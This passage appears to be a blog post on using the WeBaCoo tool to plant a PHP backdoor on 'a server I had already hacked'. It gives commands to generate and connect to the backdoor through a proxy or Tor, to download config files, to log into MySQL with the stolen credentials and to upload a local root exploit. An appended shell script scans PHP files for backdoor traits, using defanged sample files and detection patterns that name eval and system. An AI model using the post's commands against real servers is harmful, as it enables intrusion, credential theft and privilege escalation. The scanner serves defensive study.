      ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
      7) Open a "terminal" connection through Tor and log the session:
      ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt
      Now that the tool is installed and the commands are known, we will create the backdoor and connect to the web server from the console.
      For this case I took a server I had already hacked, where I will upload the backdoor created with the following command:
      ./webacoo.pl -g -o backdoor.php
      backdoor.php is created in the WeBaCoo folder; upload the file to the hacked server and connect to it with the "terminal" command shown above (-t -u with the URL of the uploaded file).
      The connection to the server works and is very fast.
      Simple commands:
      Type "load" to list the modules the tool provides on the server, which are:
      1) MySQL-CLI: MySQL command line module:
      mysql-cli (e.g. 'mysql-cli 10.0.1.11 admin pass')
      2) PSQL-CLI: Postgres command line module:
      psql-cli (e.g. 'psql-cli 10.0.1.12 root pass testdb')
      3) Upload: file upload module:
      upload (e.g. 'upload exploit.c /tmp/')
      4) Download: file download module:
      download (e.g. 'download config.php')
      5) Stealth: stealth enhancement module:
      stealth (e.g. 'stealth /var/www/html')
      These commands are easy to use; here is a brief demonstration with the MySQL-CLI module to connect to the database on the server.
      1) Download the configuration file:
      download configuration.php
      2) Open configuration.php, copy the MySQL user and password, and type:
      mysql-cli 127.0.0.1:3306 db_user db_password
      3) The tool connects to MySQL; type show databases; to list all the databases.
      The other modules work the same way, for example to upload a local root exploit or to download any file from the server.
      With this tool you no longer depend on netcat being present on the web server, or on a back-connect that often fails, to get a shell on it.
      I hope this is useful.
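WeBaCoo's backdoor hides its eval() behind string tricks and reads its command from a cookie, which suggests what to look for on a server you suspect. The script below is an added example (not part of the post or of WeBaCoo) that scores PHP files by how many such traits they show; the patterns are my own heuristics rather than a signature for WeBaCoo, and the four sample files are constructed look-alikes that execute nothing.

```shell
#!/bin/sh
# Added example, not part of the post or of WeBaCoo: a coarse scan for
# cookie-driven, eval()-based PHP backdoors. The patterns are heuristics of my
# own, not a WeBaCoo signature; the sample files are constructed look-alikes
# that execute nothing. On a real host point scan_php_backdoors at the docroot.

# backdoor_score FILE -> number of suspicious traits the file shows (0..6)
backdoor_score() {
    score=0
    for pat in \
        '(eval|assert)[[:space:]]*\('                                        \
        'base64_decode|edoced_46esab|gzinflate|gzuncompress|str_rot13|strrev' \
        '\$_(COOKIE|REQUEST|GET|POST)'                                        \
        '(system|shell_exec|passthru|exec|popen|proc_open)[[:space:]]*\('     \
        '(include|require)(_once)?[[:space:]]*\(?[[:space:]]*\$_'            \
        'ini_restore|open_basedir|safe_mode|disable_functions'
    do
        # edoced_46esab is base64_decode spelled backwards, the usual way to
        # keep the call out of a naive grep for base64_decode
        grep -Eiq "$pat" "$1" && score=$((score + 1))
    done
    echo "$score"
}

# scan_php_backdoors DOCROOT [MIN] -> "score path" for PHP files scoring at
# least MIN (default 2), highest first. php.ini is included because a file
# with that name is used as a PHP include wrapper in the 403-bypass post.
scan_php_backdoors() {
    min=${2:-2}
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name 'php.ini' \) 2>/dev/null |
    while read -r f; do
        s=$(backdoor_score "$f")
        if [ "$s" -ge "$min" ]; then echo "$s $f"; fi
    done | sort -rn
}

# Constructed sample files.
DEMO=$(mktemp -d)
mkdir -p "$DEMO/htdocs/images" "$DEMO/htdocs/uploads" "$DEMO/htdocs/sym"
# ordinary application code
cat > "$DEMO/htdocs/index.php" <<'EOF'
<?php
$name = htmlspecialchars($_GET["name"] ?? "world");
echo "Hello, $name";
EOF
# obfuscated style: reversed function name, eval, payload removed
cat > "$DEMO/htdocs/images/thumb.php" <<'EOF'
<?php
$b = strrev("edoced_46esab");
eval($b(str_replace(" ", "", "<payload omitted>")));
EOF
# raw style: the command arrives in a cookie; the line that would run it is commented out
cat > "$DEMO/htdocs/uploads/raw.php" <<'EOF'
<?php
if (isset($_COOKIE["cm"])) {
    $cmd = base64_decode($_COOKIE["cm"]);
    // system($cmd . " 2>&1");
}
EOF
# the php.ini include wrapper from the 403-bypass post, shortened
cat > "$DEMO/htdocs/sym/php.ini" <<'EOF'
<?php include($_GET["file"]); ini_restore("open_basedir"); ?>
EOF

echo "== PHP files worth a look under $DEMO/htdocs =="
scan_php_backdoors "$DEMO/htdocs"
```

Treat hits as a reading list, not a verdict: minifiers and template caches also score on eval and base64_decode, and a backdoor that keeps its cookie name and system() call inside the base64 blob, as the obfuscated sample does, only scores on the eval and the reversed function name. That is why the default threshold is low and the output is meant to be reviewed by hand.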